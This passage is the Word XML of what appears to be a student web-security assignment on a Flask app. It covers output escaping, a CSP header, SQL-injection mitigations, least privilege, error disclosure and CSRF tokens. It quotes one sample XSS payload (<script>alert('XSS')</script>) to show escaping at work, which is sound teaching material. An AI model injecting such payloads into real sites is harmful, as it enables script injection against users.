    <w:p w14:paraId="1948E1F5" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>With this fix, if a user submits &lt;script&gt;alert('XSS')&lt;/script&gt;, Jinja2 renders it as the literal text &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt;script&amp;gt;alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('XSS')&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; — displayed as harmless text on screen, not executed as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11223D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585B3468" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Fix 2: Content Security Policy (CSP) Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6671A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a defence-in-depth measure, a Content Security Policy header is added via a Flask </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>after_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hook. This instructs the browser to refuse to execute any inline scripts or scripts loaded from external domains, even if an XSS payload somehow bypasses encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE2ACF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="4E23E6DB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="561D2349" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Add to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="36DF8A6D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>@app.after_request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CE4872" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>def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set_csp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(response):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CBE16E1" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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response.headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>['Content-Security-Policy'] = \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03808AF0" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        "default-</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'self'; script-</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'self'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755EBA74" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="525C3CFE" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379CC985" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The policy default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'self'; script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'self' means: only load resources (scripts, styles, images) from the same origin. Inline &lt;script&gt; tags and event handlers (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="...") are blocked. Any stored XSS payload that remains in the database is rendered as visible text rather than executed code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBC6B7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="300" w:type="dxa"/>
          <w:left w:w="200" w:type="dxa"/>
          <w:bottom w:w="300" w:type="dxa"/>
          <w:right w:w="200" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="269F96AF"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7F7"/>
          </w:tcPr>
          <w:p w14:paraId="34331453" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6ECC56C6" wp14:editId="3029E051">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5689600" cy="319849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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5689600" cy="3198495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53648BF1" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53598A9F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3: Secure Coding Practices Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D27C915" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5A03DE" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Question 1 – Two Additional SQL Injection Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53424E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Stored Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072357F9" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Stored procedures are pre-compiled SQL routines defined in the database itself. Because the SQL logic is fixed at compile time, user input passed as parameters cannot alter the query structure. Even if malicious characters are supplied, they are treated as data arguments, not as SQL commands. This provides a similar guarantee to parameterized queries at the application layer, but enforced by the database engine directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F29052" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019781B8" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Allow-list Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5820EC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rather than relying solely on how the query is constructed, allow-list validation rejects input that does not conform to a strict expected pattern before it ever reaches the database. For example, a username field might only permit alphanumeric characters and underscores (validated with a regex such as ^[a-zA-Z0-9_]{3,30}$). Any input containing SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metacharacters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (quotes, dashes, semicolons) fails validation and is rejected immediately. This reduces the attack surface at the earliest possible point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF3D69A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647CA141" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Question 2 – Principle of Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4331E7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The principle of least privilege states that a software component — user, process, or service — should be granted only the minimum permissions necessary to perform its intended function, and nothing more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DE24FC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Applied to the database user in this application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3DCEFB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The Flask application only needs to SELECT, INSERT, and UPDATE rows in the users and comments tables. It should not need to DROP tables, CREATE new tables, or access system tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A618E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A dedicated database user (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>app_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) should be created with only those specific permissions granted, rather than connecting as the database owner or root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BD4D6C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>In the context of SQLite (used here), this is harder to enforce, but in production databases like PostgreSQL or MySQL, GRANT statements can restrict exactly which operations are allowed on which tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FCAA0" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The benefit: even if an attacker achieves SQL injection, the blast radius is limited. They cannot drop the entire schema or read other databases because the application user has no permission to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D4446" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D11DB3" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Question 3 – Why Detailed Error Messages are Dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D47FF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Exposing stack traces, exception messages, or database error strings to end users in a production application creates several serious risks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676FF805" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Information disclosure: Stack traces reveal internal file paths, function names, library versions, database schemas, and query structures — all valuable reconnaissance for an attacker planning further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8AD7B8" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Attack confirmation: A failed SQL injection attempt that returns a database error (e.g., "sqlite3.OperationalError: near 'OR': syntax error") tells the attacker exactly which database engine is running and that their injection was partially processed, helping them refine their payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62828A01" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Credibility and trust: Visible errors undermine user confidence and may expose PII or sensitive business logic inadvertently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5323D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The correct approach is to log full error details server-side (to a log file or monitoring service accessible only to developers), while showing users a generic message such as "An unexpected error occurred. Please try again."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D951AE4" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C35504E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Question 4 – Additional Security Measure: CSRF Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14569203" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation: Cross-Site Request Forgery (CSRF) Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C301D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-Site Request Forgery (CSRF) is an attack where a malicious website tricks a logged-in user's browser into submitting a form request to a different site (such as this application) without the user's knowledge or consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323EBD20" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>For example, an attacker could embed a hidden form on their own website that automatically posts a comment (or changes account settings) on behalf of any logged-in user who visits the attacker's page. Because the browser automatically includes cookies with cross-origin requests, the server cannot distinguish the legitimate request from the forged one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA4061" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>How to Implement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B49537" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The standard mitigation is the synchronizer token pattern: the server generates a unique, secret, per-session CSRF token and embeds it as a hidden field in every HTML form. When the form is submitted, the server verifies the token matches. A forged request from another origin cannot read or include the correct token (due to the Same-Origin Policy), so it is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECD3FDD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>In Flask, the Flask-WTF extension provides CSRF protection with minimal configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1317D5CF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="297761B2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1472157B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Install: pip install flask-wtf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77AEDAC2" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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flask_wtf.csrf</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CSRFProtect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0A0B44D5" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F"/>
          <w:p w14:paraId="6D5C58B2" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>app = Flask(__name__)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC3A326" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>app.secret_key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 'a-strong-random-secret-key'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E568D4C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>csrf</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CSRFProtect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(app)   # Automatically validates CSRF tokens on all POST requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63EBAF45" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63AFE074" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>With CSRF protection enabled, every POST form must include a valid token, blocking forged cross-site submissions even if an attacker already knows a user is authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D429BAD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5B3E60" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A74AC62" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Summary: Vulnerabilities and Fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49061EB1" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="16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9"/>
        <w:gridCol w:w="3080"/>
        <w:gridCol w:w="4081"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="62CABA4D"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1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="0AD44625" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="0C93A4C1" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4081" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="17243324" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fix Applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00892D2F" w14:paraId="14FF0A5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5A0E17" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
